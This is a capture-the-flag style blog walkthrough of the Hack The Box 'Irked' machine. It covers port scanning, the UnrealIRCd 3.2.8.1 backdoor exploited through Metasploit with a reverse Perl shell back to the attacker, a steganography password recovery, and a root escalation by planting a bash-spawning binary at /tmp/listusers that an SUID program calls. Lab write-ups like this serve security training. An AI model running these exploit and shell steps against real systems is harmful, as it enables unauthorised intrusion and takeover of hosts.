Redhalo

Hack the box – Irked machine

New easy box today from Hack the box : Irked. A linux machine made by MrAgent a while ago.

Let’s jump it!

Enumeration

For this machine, my regular enumeration nmap command was incomplete. So I helped myself with nmap automator with gave me more details about Irked machine.

For the installation, it is quite simple

[email protected]:~/Documents$ git clone https://github.com/21y4d/nmapAutomator.git
Cloning into 'nmapAutomator'...
remote: Enumerating objects: 160, done.
remote: Total 160 (delta 0), reused 0 (delta 0), pack-reused 160
Receiving objects: 100% (160/160), 48.13 KiB | 400.00 KiB/s, done.
Resolving deltas: 100% (49/49), done.
[email protected]:~/Documents$ cd nmapAutomator/
[email protected]:~/Documents/nmapAutomator$ ls
nmapAutomator.sh  README.md
[email protected]:~/Documents/nmapAutomator$ chmod +x nmapAutomator.sh

Then to use it:

./nmapAutomator.sh    
./nmapAutomator.sh 10.1.1.1 All  
./nmapAutomator.sh 10.1.1.1 Basic  
./nmapAutomator.sh 10.1.1.1 Recon  
Quick: Shows all open ports quickly (~15 seconds)
Basic: Runs Quick Scan, then runs a more thorough scan on found ports (~5 minutes)
UDP: Runs "Basic" on UDP ports (~5 minutes)
Full: Runs a full range port scan, then runs a thorough scan on new ports (~5-10 minutes)
Vulns: Runs CVE scan and nmap Vulns scan on all found ports (~5-15 minutes)
Recon: Runs "Basic" scan "if not yet run", then suggests recon commands "i.e. gobuster, nikto, smbmap" based on the found ports, then prompts to automatically run them
All: Runs all the scans consecutively (~20-30 minutes)

This is the result of the Irked machine with a Full scan:

[email protected]:~/Documents/nmapAutomator$ ./nmapAutomator.sh 10.129.75.124 Full

Running a Full scan on 10.129.75.124

Host is likely running Linux



---------------------Starting Nmap Full Scan----------------------

Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-03 11:26 EST
Initiating Parallel DNS resolution of 1 host. at 11:26
Completed Parallel DNS resolution of 1 host. at 11:26, 0.01s elapsed
Initiating Connect Scan at 11:26
Scanning 10.129.75.124 [65535 ports]
Discovered open port 22/tcp on 10.129.75.124
Discovered open port 80/tcp on 10.129.75.124
Discovered open port 111/tcp on 10.129.75.124
Discovered open port 6697/tcp on 10.129.75.124
Discovered open port 42964/tcp on 10.129.75.124
Warning: 10.129.75.124 giving up on port because retransmission cap hit (1).
Connect Scan Timing: About 22.68% done; ETC: 11:29 (0:01:46 remaining)
Connect Scan Timing: About 45.45% done; ETC: 11:29 (0:01:13 remaining)
Discovered open port 8067/tcp on 10.129.75.124
Connect Scan Timing: About 68.25% done; ETC: 11:29 (0:00:42 remaining)
Discovered open port 65534/tcp on 10.129.75.124
Completed Connect Scan at 11:29, 134.37s elapsed (65535 total ports)
Nmap scan report for 10.129.75.124
Host is up (0.031s latency).
Not shown: 64752 closed ports, 776 filtered ports
PORT      STATE SERVICE                                                                                                                                                                                                                    
22/tcp    open  ssh                                                                                                                                                                                                                        
80/tcp    open  http                                                                                                                                                                                                                       
111/tcp   open  rpcbind                                                                                                                                                                                                                    
6697/tcp  open  ircs-u                                                                                                                                                                                                                     
8067/tcp  open  infi-async                                                                                                                                                                                                                 
42964/tcp open  unknown                                                                                                                                                                                                                    
65534/tcp open  unknown

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 134.46 seconds


Making a script scan on all ports
                                                                                                                                                                                                                                           
Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-03 11:29 EST
Nmap scan report for 10.129.75.124
Host is up (0.032s latency).

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey: 
|   1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)
|   2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)
|   256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)
|_  256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519)
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Site doesn't have a title (text/html).
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          42576/tcp6  status
|   100024  1          42964/tcp   status
|   100024  1          52642/udp   status
|_  100024  1          56422/udp6  status
6697/tcp  open  irc     UnrealIRCd
8067/tcp  open  irc     UnrealIRCd
42964/tcp open  status  1 (RPC #100024)
65534/tcp open  irc     UnrealIRCd (Admin email [email protected])
Service Info: Host: irked.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 73.48 seconds



---------------------Finished all Nmap scans---------------------
                                                                                                                                                                                                                                           

Completed in 3 minute(s) and 29 second(s)

Looking at the website on port 80, we have a single page with a big logo and the following text : “IRC is almost working!”

Nothing interresting has been found with dirbuster or nikto.

Ok so let’s try to connect to their IRC server. I needed to install an IRC client. I found irssi easy to install and to use.

For installation:

[email protected]:~/Documents$ sudo apt-get install irssi
[sudo] password for kali: 
Reading package lists... Done
Building dependency tree       
Reading state information... Done
Suggested packages:
  irssi-scripts
The following NEW packages will be installed:
  irssi
0 upgraded, 1 newly installed, 0 to remove and 986 not upgraded.
Need to get 1,183 kB of archives.
After this operation, 2,919 kB of additional disk space will be used.
Get:1 http://ftp.halifax.rwth-aachen.de/kali kali-rolling/main amd64 irssi amd64 1.2.2-1+b1 [1,183 kB]
Fetched 1,183 kB in 3s (405 kB/s)                                     
Selecting previously unselected package irssi.
(Reading database ... 260119 files and directories currently installed.)
Preparing to unpack .../irssi_1.2.2-1+b1_amd64.deb ...
Unpacking irssi (1.2.2-1+b1) ...
Setting up irssi (1.2.2-1+b1) ...
Processing triggers for kali-menu (2020.3.2) ...
Processing triggers for man-db (2.9.3-2) ...
[email protected]:~/Documents$ 

Then to use, you type the command irssi for having the following screen:

To connect to our server, use the following command:

/connect 10.129.75.124 6697

I am now connected and I could see the IRC server version used : Unreal3.2.8.1

A search with searchploit gave me an exploit available on metasploit: Backdoor Command Execution

FOOTHOLD

There are not too much options needed:

msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > show options

Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
   RPORT   6667             yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target


don’t forget your payload, I have used cmd/unix/reverse_perl

msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set payload cmd/unix/reverse_perl
payload => cmd/unix/reverse_perl
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set rhosts 10.129.75.124
rhosts => 10.129.75.124
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set lhost tun0
lhost => 10.10.14.105
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set rport 6697
rport => 6697

Then we have our shell:

LATERAL MOVEMENT

With the help of Linpeas I have found out that a hidden backup file is accessible on the Documents folder of djmardov

[email protected]:/home/djmardov/Documents$ ls -al
ls -al
total 16
drwxr-xr-x  2 djmardov djmardov 4096 May 15  2018 .
drwxr-xr-x 18 djmardov djmardov 4096 Nov  3  2018 ..
-rw-r--r--  1 djmardov djmardov   52 May 16  2018 .backup
-rw-------  1 djmardov djmardov   33 May 15  2018 user.txt
[email protected]:/home/djmardov/Documents$ cat .backup
cat .backup
Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss
[email protected]:/home/djmardov/Documents$ 

Steganography is very new for me but it is easy understandable that we need a picture to unlock something else with the password mentioned.

I saw only one picture so far : it is the big smiley on the website homepage.

So let’s give a try.. I have installed stegcracker as follow:

[email protected]:~/Documents$ sudo apt-get install stegcracker
[sudo] password for kali: 
Reading package lists... Done
Building dependency tree       
Reading state information... Done
The following additional packages will be installed:
  libmcrypt4 libmhash2 steghide
Suggested packages:
  libmcrypt-dev mcrypt
The following NEW packages will be installed:
  libmcrypt4 libmhash2 stegcracker steghide
0 upgraded, 4 newly installed, 0 to remove and 986 not upgraded.
Need to get 322 kB of archives.
After this operation, 955 kB of additional disk space will be used.
Do you want to continue? [Y/n] Y
Get:1 http://kali.download/kali kali-rolling/main amd64 libmcrypt4 amd64 2.5.8-3.4+b1 [73.3 kB]
Get:4 http://ftp2.nluug.nl/os/Linux/distr/kali kali-rolling/main amd64 stegcracker all 2.0.9-2 [10.4 kB]
Get:2 http://archive-4.kali.org/kali kali-rolling/main amd64 libmhash2 amd64 0.9.9.9-9 [94.2 kB]
Get:3 http://ftp.acc.umu.se/mirror/kali.org/kali kali-rolling/main amd64 steghide amd64 0.5.1-15 [144 kB]
Fetched 322 kB in 1s (240 kB/s)                                     
Selecting previously unselected package libmcrypt4.
(Reading database ... 260305 files and directories currently installed.)
Preparing to unpack .../libmcrypt4_2.5.8-3.4+b1_amd64.deb ...
Unpacking libmcrypt4 (2.5.8-3.4+b1) ...
Selecting previously unselected package libmhash2:amd64.
Preparing to unpack .../libmhash2_0.9.9.9-9_amd64.deb ...
Unpacking libmhash2:amd64 (0.9.9.9-9) ...
Selecting previously unselected package steghide.
Preparing to unpack .../steghide_0.5.1-15_amd64.deb ...
Unpacking steghide (0.5.1-15) ...
Selecting previously unselected package stegcracker.
Preparing to unpack .../stegcracker_2.0.9-2_all.deb ...
Unpacking stegcracker (2.0.9-2) ...
Setting up libmhash2:amd64 (0.9.9.9-9) ...
Setting up libmcrypt4 (2.5.8-3.4+b1) ...
Setting up steghide (0.5.1-15) ...
Setting up stegcracker (2.0.9-2) ...
Processing triggers for libc-bin (2.30-8) ...
Processing triggers for man-db (2.9.3-2) ...
Processing triggers for kali-menu (2020.3.2) ...

Then download the picture, create a file with the password just discovered above and ran the following command:

[email protected]:~/Documents$ wget http://10.129.75.124/irked.jpg
--2021-01-03 11:59:33--  http://10.129.75.124/irked.jpg                                                                                                                                                                                    
Connecting to 10.129.75.124:80... connected.                                                                                                                                                                                               
HTTP request sent, awaiting response... 200 OK                                                                                                                                                                                             
Length: 34697 (34K) [image/jpeg]                                                                                                                                                                                                           
Saving to: ‘irked.jpg’

irked.jpg                                                  100%[=======================================================================================================================================>]  33.88K  --.-KB/s    in 0.1s    

2021-01-03 11:59:33 (334 KB/s) - ‘irked.jpg’ saved [34697/34697]

[email protected]:~/Documents$ echo "UPupDOWNdownLRlrBAbaSSss" > pass.txt
[email protected]:~/Documents$ stegcracker irked.jpg pass.txt
StegCracker 2.0.9 - (https://github.com/Paradoxis/StegCracker)
Copyright (c) 2021 - Luke Paris (Paradoxis)

Counting lines in wordlist..
Attacking file 'irked.jpg' with wordlist 'pass.txt'..
Successfully cracked file with password: UPupDOWNdownLRlrBAbaSSss
Tried 1 passwords
Your file has been written to: irked.jpg.out
UPupDOWNdownLRlrBAbaSSss
[email protected]:~/Documents$ cat irked.jpg.out
Kab6h+m+bbp2J:HG

What I found is actually the password for djmardov user.

[email protected]:/home/djmardov/Documents$ su djmardov
su djmardov
Password: Kab6h+m+bbp2J:HG

[email protected]:~/Documents$ 

Privilege Escalation

With a new linpeas scan I found out an unusual binary:

By executing this binary I had the following output:

[email protected]:~/Documents$ /usr/bin/viewuser
/usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2021-01-03 11:22 (:0)
sh: 1: /tmp/listusers: not found

Last line seems interresting. I may be able to create my payload under /tmp/listusers and spaw a shell with root permissions.

Let’s give a try.

I have created a file listusers.c and copy the following:

#include 
#include 
#include 

int main(){
    setuid(getuid());
    system("/bin/bash");
    return 0;
}

Then run the following command to compile the code in the desired folder and name:

gcc listusers.c -o /tmp/listusers

Then when I executed again /usr/bin/viewuser I have been finally root !

[email protected]:~/Documents$ /usr/bin/viewuser
/usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2021-01-03 11:22 (:0)
djmardov pts/1        2021-01-03 12:14 (10.10.14.105)
[email protected]:~/Documents# whoami
whoami
root